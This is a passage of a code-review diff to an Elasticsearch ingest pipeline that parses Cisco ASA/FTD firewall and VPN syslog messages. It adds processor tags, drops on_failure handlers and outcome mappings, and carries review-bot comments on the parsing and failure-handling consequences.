@@ -925,13 +865,23 @@ processors: - "Group %{NOTSPACE:_temp_.cisco.webvpn.group_name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} WebVPN session terminated: %{GREEDYDATA:event.reason}." - grok: if: "ctx._temp_.cisco.message_id == '722011'" + tag: parse_722011 field: "message" description: "722011" patterns: - 'Group <%{NOTSPACE:source.user.group.name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> SVC Message: %{GREEDYDATA:event.reason}\.' - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} SVC Message: %{GREEDYDATA:event.reason}\.' + - grok: + if: '["722022", "722023"].contains(ctx._temp_.cisco.message_id)' + tag: parse_722022-722023 + field: "message" + description: "722022, 722023" + patterns: + - 'Group <%{NOTSPACE:source.user.group.name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> %{GREEDYDATA:event.reason}' + - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} %{GREEDYDATA:event.reason}' - grok: if: "ctx._temp_.cisco.message_id == '722033'" + tag: parse_722033 field: "message" description: "722033" patterns: @@ -939,6 +889,7 @@ processors: - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} First %{NOTSPACE:network.transport} SVC connection established for SVC session\.' - grok: if: "ctx._temp_.cisco.message_id == '722034'" + tag: parse_722034 field: "message" description: "722034" patterns: @@ -946,6 +897,7 @@ processors: - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} New %{NOTSPACE:network.transport} SVC connection, no existing connection\.' - grok: if: "ctx._temp_.cisco.message_id == '722037'" + tag: parse_722037 field: "message" description: "722037" patterns: 
@@ -953,6 +905,7 @@ processors: - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} SVC closing connection: %{GREEDYDATA:event.reason}\.' - grok: if: "ctx._temp_.cisco.message_id == '722051'" + tag: parse_722051 field: "message" description: "722051" patterns: 
@@ -960,170 +913,105 @@ processors: - "Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} IPv4 Address %{IP:_temp_.cisco.assigned_ip} %{GREEDYDATA}" - grok: if: "ctx._temp_.cisco.message_id == '733100'" + tag: parse_733100 field: "message" description: "733100" patterns: - \[(%{SPACE})?%{DATA:_temp_.cisco.burst.object}\] drop %{NOTSPACE:_temp_.cisco.burst.id} exceeded. Current burst rate is %{INT:_temp_.cisco.burst.current_rate} per second, max configured rate is %{INT:_temp_.cisco.burst.configured_rate}; Current average rate is %{INT:_temp_.cisco.burst.avg_rate} per second, max configured rate is %{INT:_temp_.cisco.burst.configured_avg_rate}; Cumulative total count is %{INT:_temp_.cisco.burst.cumulative_count} - dissect: if: "ctx._temp_.cisco.message_id == '734001'" + tag: parse_734001 field: "message" description: "734001" pattern: "DAP: User %{user.email}, Addr %{source.address}, Connection %{_temp_.cisco.connection_type}: The following DAP records were selected for this connection: %{_temp_.cisco.dap_records->}" - dissect: if: "ctx._temp_.cisco.message_id == '805001'" + tag: parse_805001 field: "message" description: "805001" pattern: "Offloaded %{network.transport} Flow for connection %{_temp_.cisco.connection_id} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})" - dissect: if: "ctx._temp_.cisco.message_id == '805002'" + tag: parse_805002 field: "message" description: "805002" pattern: "%{network.transport} Flow is no longer offloaded for connection %{_temp_.cisco.connection_id} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} 
(%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})" - split: field: "_temp_.cisco.dap_records" + tag: split_dap_records separator: ",\\s+" ignore_missing: true - dissect: if: "ctx._temp_.cisco.message_id == '434002'" + tag: parse_434002 field: "message" - pattern: "SFR requested to %{event.action} %{network.protocol} packet from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "SFR requested to drop %{network.protocol} packet from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '434004'" + tag: parse_434004 field: "message" - pattern: "SFR requested ASA to %{event.action} further packet redirection and process %{network.protocol} flow from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} locally" + pattern: "SFR requested ASA to bypass further packet redirection and process %{network.protocol} flow from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} locally" - dissect: if: "ctx._temp_.cisco.message_id == '110002'" + tag: parse_110002 field: "message" pattern: "%{event.reason} for %{network.protocol} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '419002'" + tag: parse_419002 field: "message" pattern: "%{event.reason}from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{+event.reason}" - dissect: if: '["602303", "602304"].contains(ctx._temp_.cisco.message_id)' + tag: 
parse_602303-602304 field: "message" - pattern: "%{network.type}: An %{network.direction} %{_temp_.cisco.tunnel_type} SA (SPI= %{}) between %{source.address} and %{destination.address} (user= %{user.name}) has been %{event.action}." + pattern: "%{network.type}: An %{network.direction} %{_temp_.cisco.tunnel_type} SA (SPI= %{}) between %{source.address} and %{destination.address} (user= %{user.name}) has been %{}." - dissect: if: "ctx._temp_.cisco.message_id == '750002'" + tag: parse_750002 field: "message" pattern: "Local:%{source.address}:%{source.port} Remote:%{destination.address}:%{destination.port} Username:%{user.name} %{event.reason}" - dissect: if: "ctx._temp_.cisco.message_id == '713120'" + tag: parse_713120 field: "message" pattern: "Group = %{}, IP = %{source.address}, %{event.reason} (msgid=%{event.id})" - dissect: if: "ctx._temp_.cisco.message_id == '713202'" + tag: parse_713202 field: "message" pattern: "IP = %{source.address}, %{event.reason}. %{} packet." # Support masked user - grok: if: "ctx._temp_.cisco.message_id == '716039'" + tag: parse_716039 field: "message" patterns: - "Authentication: rejected, group = %{NOTSPACE:source.user.group.name} user = %{USER:source.user.name} , Session Type: %{NOTSPACE:_temp_.cisco.session_type}" - "Group <%{NOTSPACE:source.user.group.name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> Authentication: rejected, Session Type: %{NOTSPACE:_temp_.cisco.session_type}\\." 
- dissect: if: "ctx._temp_.cisco.message_id == '750003'" + tag: parse_750003 field: "message" pattern: "Local:%{source.address}:%{source.port} Remote:%{destination.address}:%{destination.port} Username:%{user.name} %{event.reason} ERROR:%{+event.reason}" - grok: if: '["713905", "713904", "713906", "713902", "713901"].contains(ctx._temp_.cisco.message_id)' + tag: parse_713901-713906 field: "message" patterns: - "^(Group = %{IP}, )?(IP = %{IP:source.address}, )?%{GREEDYDATA:event.reason}$" - # Handle ecs action outcome protocol - - set: - if: '["434002", "434004"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "unknown" - set: if: '["419002"].contains(ctx._temp_.cisco.message_id)' + tag: parse_419002 field: "network.protocol" value: "tcp" - - set: - if: '["110002"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "dropped" - - set: - if: '["713120"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "success" - - set: - if: '["113004", "113012"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "success" - - set: - if: '["113002", "113005", "113021"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "failure" - - set: - if: '["602303", "602304", "611101"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "success" - - set: - if: '["605004", "611102"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "failure" - - set: - if: '["734001"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "success" - - set: - if: '["716039"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "failure" - - set: - if: '["710005"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "dropped" - - set: - if: '["713901", "713902", "713903", "713904", "713905"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "failure" - - set: - if: 
'["113039"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "client-vpn-connected" - - set: - if: '["113029","113030","113031","113032","113033","113034","113035","113036","113037","113038","113040"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "client-vpn-error" - - set: - if: '["113019"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "client-vpn-disconnected" - - set: - if: '["750002", "750003"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "connection-started" - - set: - if: '["750003", "713905", "713904", "713906", "713902", "713901"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "error" - - set: - if: '["113005", "113021", "605004", "611102", "716039"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "logon-failed" - - set: - if: '["113004", "113012", "611101", "734001"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "logged-in" - - append: - if: '["750003", "713905", "713904", "713906", "713902", "713901"].contains(ctx._temp_.cisco.message_id)' - field: "event.type" - value: "error" # # Handle 302xxx messages (Flow expiration a.k.a "Teardown") # - - set: - if: '["305012", "302014", "302016", "302018", "302021", "302036", "302304", "302306", "609001", "609002"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "flow-expiration" - description: "305012, 302014, 302016, 302018, 302021, 302036, 302304, 302306, 609001, 609002" - grok: field: "message" - tag: "grok_message_302xxx_teardown" + tag: parse_302xxx if: '["302014", "302016", "302018", "302021", "302036", "302304", "302306"].contains(ctx._temp_.cisco.message_id)' description: "302014, 302016, 302018, 302021, 302036, 302304, 302306" patterns: 
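Review bot: The `set` processor for 419002's `network.protocol` is given `tag: parse_419002`, the same tag already used by the 419002 dissect earlier in this hunk; the tag is the only thing `_ingest.on_failure_processor_tag` reports, so a duplicate makes a failure ambiguous — use `tag: set_419002_network_protocol`. More broadly, this hunk deletes every `event.outcome`/`event.action` mapping for the authentication and VPN ids (113004/113005/113012/113021, 611101/611102, 605004, 716039, 713901-713905, 750002/750003, 113019/113039) and the `flow-expiration` action for 609001/609002 and the 302xxx teardown ids, with no replacement visible in this diff. If these moved to a central id→outcome/action table, please reference it in a comment here; if not, detection content that filters on `event.outcome: failure` or `event.action: logon-failed` stops matching. A pipeline test sample per removed group would make this verifiable.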
@@ -1135,7 +1023,7 @@ processors: - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER_OR_SGT_SRC}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER_OR_SGT_DST}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) - ^Teardown %{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:\(?%{CISCO_USER_OR_SGT_DST}\)? )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:\(%{CISCO_USER_OR_SGT_SRC}\))?(\s*type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})? pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" 
@@ -1146,12 +1034,6 @@ processors: CISCO_USER_OR_SGT_DST: (?:%{CISCO_USER:_temp_.cisco.destination_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.destination_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.destination_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.destination_user_or_sgt})\)) CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(?:%{HOSTNAME}\\)?%{USERNAME}\$?(?:@%{HOSTNAME})?%{CISCO_SGT}?)|[^$]+) CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # Decode FTD's Security Event Syslog Messages @@ -1170,12 +1052,6 @@ processors: target_field: "_temp_.orig_security" trim_key: " " trim_value: " " - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # Remove _temp_.full_message. @@ -1186,6 +1062,7 @@ processors: - rename: description: Retain full log message without the Cisco codes for later search. if: ctx.tags != null && ctx.tags.contains('keep_message') && ctx._temp_?.cisco?.full_message == null + tag: rename_full_message field: message target_field: _temp_.cisco.full_message - remove: @@ -1218,6 +1095,7 @@ processors: #******************************************************************************* - script: if: ctx._temp_?.orig_security != null + tag: script_ftd_events params: ACPolicy: target: ac_policy @@ -1582,6 +1460,7 @@ processors: # Normalize ECS field values # - script: + tag: script_normalize_ftd_events lang: painless params: "ctx._temp_.cisco.message_id": 
@@ -1677,6 +1556,7 @@ processors: # This will fill event.start, event.end and event.duration # - script: + tag: script_process_flow_duration lang: painless if: "ctx?._temp_?.duration_hms != null" source: > @@ -1715,18 +1595,12 @@ processors: - '%{CISCO_DOMAIN_USER:_temp_.cisco.source_username}\$?\)?%{CISCO_SGT}' - '%{CISCO_DOMAIN_USER:_temp_.cisco.source_username}\$?\)?' pattern_definitions: - CISCO_DOMAIN_USER: (%{CISCO_DOMAIN})?%{CISCO_USER}? - CISCO_USER: "[^,$)]+" + CISCO_DOMAIN_USER: (%{CISCO_DOMAIN})?%{CISCO_USER} + CISCO_USER: "[^,$)]*" CISCO_DOMAIN: (LOCAL\\)?(%{HOSTNAME}\\)? CISCO_SGT: (, *(%{CISCO_SGT_TAG}:%{CISCO_SGT_NAME}|%{CISCO_SGT_TAG}))|(%{CISCO_SGT_TAG}:%{CISCO_SGT_NAME}) CISCO_SGT_TAG: (%{NUMBER:_temp_.cisco.source_user_security_group_tag}) CISCO_SGT_NAME: (%{WORD:_temp_.cisco.source_user_security_group_tag_name}) - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # Parse Source without User only containing SGT - grok: field: "_temp_.cisco.source_sgt" @@ -1736,14 +1610,9 @@ processors: - '%{CISCO_SGT}' pattern_definitions: CISCO_SGT: (, *)?(%{NUMBER:_temp_.cisco.source_user_security_group_tag})?:?%{WORD:_temp_.cisco.source_user_security_group_tag_name}? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - convert: field: _temp_.cisco.source_user_security_group_tag + tag: convert_source_user_security_group_tag type: long ignore_missing: true - grok: 
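Review bot: Changing `CISCO_USER` to `[^,$)]*` and making it mandatory in `CISCO_DOMAIN_USER` means the pattern now matches the empty string, so this grok can no longer fail on the source-user field; an unparseable value silently becomes an empty `_temp_.cisco.source_username` instead of an error. That is only safe because a later `remove` drops the temp field when it equals `""` (the destination counterpart is visible further down; the source one is not in this view — confirm it exists), otherwise `set_source_user_name` would write an empty `source.user.name`. A comment above the definitions, e.g. `# CISCO_USER may be empty; the empty result is removed before source.user.name is set`, would record that dependency. The grok's `field:` and first patterns lie above this hunk.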
@@ -1754,18 +1623,12 @@ processors: - '%{CISCO_DOMAIN_USER:_temp_.cisco.destination_username}\$?\)?%{CISCO_SGT}' - '%{CISCO_DOMAIN_USER:_temp_.cisco.destination_username}\$?\)?' pattern_definitions: - CISCO_DOMAIN_USER: (%{CISCO_DOMAIN})?%{CISCO_USER}? - CISCO_USER: "[^,$)]+" + CISCO_DOMAIN_USER: (%{CISCO_DOMAIN})?%{CISCO_USER} + CISCO_USER: "[^,$)]*" CISCO_DOMAIN: (LOCAL\\)?(%{HOSTNAME}\\)? CISCO_SGT: (, *(%{CISCO_SGT_TAG}:%{CISCO_SGT_NAME}|%{CISCO_SGT_TAG}))|(%{CISCO_SGT_TAG}:%{CISCO_SGT_NAME}) CISCO_SGT_TAG: (%{NUMBER:_temp_.cisco.destination_user_security_group_tag}) CISCO_SGT_NAME: (%{WORD:_temp_.cisco.destination_user_security_group_tag_name}) - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # Parse Destination without User only containing SGT - grok: field: "_temp_.cisco.destination_sgt" @@ -1775,14 +1638,9 @@ processors: - '%{CISCO_SGT}' pattern_definitions: CISCO_SGT: (, *)?(%{NUMBER:_temp_.cisco.destination_user_security_group_tag})?:?%{WORD:_temp_.cisco.destination_user_security_group_tag_name}? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - convert: field: _temp_.cisco.destination_user_security_group_tag + tag: convert_destination_user_security_group_tag type: long ignore_missing: true - remove: 
@@ -1798,10 +1656,12 @@ processors: field: _temp_.cisco.destination_username if: ctx._temp_?.cisco?.destination_username != null && ctx._temp_.cisco.destination_username == "" - set: + tag: set_source_user_name field: source.user.name value: "{{{ _temp_.cisco.source_username }}}" if: 'ctx?.source?.user?.name == null && ctx._temp_?.cisco?.source_username != null' - set: + tag: set_destination_user_name field: destination.user.name value: "{{{ _temp_.cisco.destination_username }}}" if: 'ctx?.destination?.user?.name == null && ctx._temp_?.cisco?.destination_username != null' @@ -1819,12 +1679,6 @@ processors: CISCO_USER_EMAIL: "%{CISCO_USER}@%{HOSTNAME:source.user.domain}" CISCO_USER: "%{USERNAME:source.user.name}" CISCO_DOMAIN: (LOCAL\\)?(%{HOSTNAME:source.user.domain}\\)? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: field: "destination.user.name" tag: "grok_destination_user_name" @@ -1837,12 +1691,6 @@ processors: CISCO_USER_EMAIL: "%{CISCO_USER}@%{HOSTNAME:destination.user.domain}" CISCO_USER: "%{USERNAME:destination.user.name}" CISCO_DOMAIN: (LOCAL\\)?(%{HOSTNAME:destination.user.domain}\\)? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # Normalize protocol names @@ -1871,6 +1719,7 @@ processors: # - script: if: "ctx?.network?.transport != null" + tag: script_process_iana_number lang: painless params: icmp: 1 
@@ -1912,32 +1761,21 @@ processors: net['iana_number'] = net.transport; net['transport'] = trans; } + - set: + field: "network.transport" + if: 'ctx.network?.transport == "icmpv6"' + value: "ipv6-icmp" + # # Normalize event.outcome # - lowercase: - field: "event.outcome" + field: "_temp_.outcome" ignore_missing: true - - set: - field: "event.outcome" - if: 'ctx.event?.outcome == "est-allowed"' - value: "allowed" - - set: - field: "event.outcome" - if: 'ctx.event?.outcome == "permitted"' - value: "allowed" - - set: - field: "event.outcome" - if: 'ctx.event?.outcome == "allow"' - value: allowed - - set: + - lowercase: field: "event.outcome" - if: 'ctx.event?.outcome == "deny"' - value: denied - - set: - field: "network.transport" - if: 'ctx.network?.transport == "icmpv6"' - value: "ipv6-icmp" + ignore_missing: true + # # Convert numeric fields to integer or long, as output of dissect and kv processors is always a string # 
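Review bot: The removed `set` processors that folded `allow`/`permitted`/`est-allowed` into `allowed` and `deny` into `denied` are not replaced by anything here, so whatever values reach `_temp_.outcome` are now matched verbatim against the per-outcome keys of the categorization script later in this diff (`denied`, `permitted`, `est-allowed`, `failed`, `ok`). The old script also handled `block`, `dropped` and `monitored`, none of which appear as keys in the new params, so if any upstream dissect/grok still emits those spellings those events silently lose their categorization (and with the current script form, error out). I cannot see the producers of `_temp_.outcome` from this hunk; if they can emit the older spellings, either keep a normalizing `set` in front of the `lowercase` or add the spellings as keys in the script params. A short comment above the `_temp_.outcome` lowercase stating that its values must match the script keys exactly would make the coupling explicit.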
@@ -1946,149 +1784,81 @@ processors: tag: "convert_source_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: destination.port tag: "convert_destination_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: source.bytes tag: "convert_source_bytes" type: long ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: destination.bytes tag: "convert_destination_bytes" type: long ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: network.bytes tag: "convert_network_bytes" type: long ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: source.packets tag: "convert_source_packets" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ 
_ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: destination.packets tag: "convert_destination_packets" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: _temp_.cisco.mapped_source_port tag: "convert_mapped_source_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - convert: field: _temp_.cisco.mapped_destination_port tag: "convert_mapped_destination_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - convert: field: _temp_.cisco.icmp_code tag: "convert_icmp_code" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: _temp_.cisco.icmp_type tag: "convert_icmp_type" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: 
"Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: _temp_.cisco.original_iana_number tag: "convert_original_iana_number" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: http.response.status_code tag: "convert_http_resp_status_code" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: file.size tag: "convert_file_size" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: network.iana_number tag: "convert_iana_number" type: string ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: sip.to.uri.port tag: "convert_sip_to_uri_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ 
_ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" # # Assign ECS .ip fields from .address is a valid IP address is found, 
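Review bot: Removing the per-processor `on_failure` blocks from the `convert_*` processors changes failure semantics, because those handlers only appended to `error.message` and let the pipeline continue, whereas a failure now propagates to the pipeline-level `on_failure` (also in this diff), which sets `event.kind: pipeline_error` and stops the remaining enrichment. The same append-only handlers are dropped from `grok_client_address`/`grok_server_address` in the next hunk and from `uriparts_url_original` further down. If aborting the event is the intent (so a non-numeric port or bytes value in attacker-controlled syslog no longer yields a partially normalized document that looks clean), it would be worth stating in the commit; if best-effort was intended, add `ignore_failure: true` to those processors instead, since the pipeline-level handler cannot resume. Either way the first-failing-processor-wins behaviour should be documented near the `# Convert numeric fields` comment.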
@@ -2100,44 +1870,24 @@ processors: tag: "grok_source_address" patterns: - "^(?:%{IP:source.ip}|%{GREEDYDATA:source.domain})$" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: field: destination.address if: ctx.destination?.address != null tag: "grok_destination_address" patterns: - "^(?:%{IP:destination.ip}|%{GREEDYDATA:destination.domain})$" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: field: client.address if: ctx.client?.address != null tag: "grok_client_address" patterns: - "^(?:%{IP:client.ip}|%{GREEDYDATA:client.domain})$" - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - grok: field: server.address if: ctx.server?.address != null tag: "grok_server_address" patterns: - "^(?:%{IP:server.ip}|%{GREEDYDATA:server.domain})$" - on_failure: - - append: - field: 